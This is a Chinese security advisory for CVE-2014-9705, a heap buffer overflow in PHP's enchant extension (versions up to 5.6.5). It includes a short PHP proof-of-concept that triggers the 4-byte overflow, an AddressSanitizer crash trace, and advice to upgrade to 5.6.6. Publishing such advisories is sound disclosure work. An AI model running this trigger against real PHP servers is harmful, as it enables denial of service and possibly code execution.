PHP堆缓冲区溢出漏洞

发布日期:2014-12-05
更新日期:2015-03-16

受影响系统:
PHP PHP <= 5.6.5
描述:
CVE(CAN) ID: CVE-2014-9705

PHP是一种通用开源脚本语言。

PHP 5.6.5及更早版本,enchant_broker_request_dict()函数存在堆缓冲区溢出漏洞,远程攻击者可利用此漏洞覆盖4个字节的堆缓冲区,造成拒绝服务或执行任意代码。

<*来源:PHP
 
  链接:https://www.htbridge.com/advisory/HTB23252
 *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
 $tag = 'en_US';
 $r = enchant_broker_init();
 $d = enchant_broker_request_dict($r, $tag);
 enchant_dict_quick_check($d, 'one', $suggs);
 $d = enchant_broker_request_dict($r, $tag);
 enchant_dict_quick_check($d, 'one', $suggs);
 $d = enchant_broker_request_dict($r, $tag);
 ?>


 Result:
 ========
 [Fri Dec 5 13:32:59 2014] Script: '/home/symeon/Desktop/dict.php'
 ---------------------------------------
 /home/ symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
 Beginning: OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
 Start: OK
 End: Overflown (magic=0x00000034 instead of 0xAF9A0F68)
 At least 4 bytes overflown
 ---------------------------------------
 ============================ =====================================
 ==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
 WRITE of size 4 at 0xaf9a0f78 thread T0
 #0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
 #1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
 #2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
 #3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
 #4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
 #5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
 #6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
 #7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
 #8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
 #9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
 #10 0x807d080 in _start ??:?
 0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
 ==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
 #0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
 #1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
 #2 0xb616ef1e in ?? ??:0
 #3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
 #4 0xb6184b7f in __asan_report_error ??:?
 #5 0xb617db2e in __asan_report_store4 ??:?
 #6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
 #7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
 #8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
 #9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
 #10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
 #11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
 #12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
 #13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
 #14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
 #15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287

建议:
厂商补丁:

PHP
 ---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载5.6.6版本:

CentOS 6.3 安装LNMP (PHP 5.4,MyySQL5.6)

在部署LNMP的时候遇到Nginx启动失败的2个问题

Ubuntu安装Nginx php5-fpm MySQL(LNMP环境搭建)

《细说PHP》高清扫描PDF+光盘源码+全套教学视频

CentOS 6中配置PHP的LNMP的开发环境 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/ed66b66a925649cceb764127e74d3618.html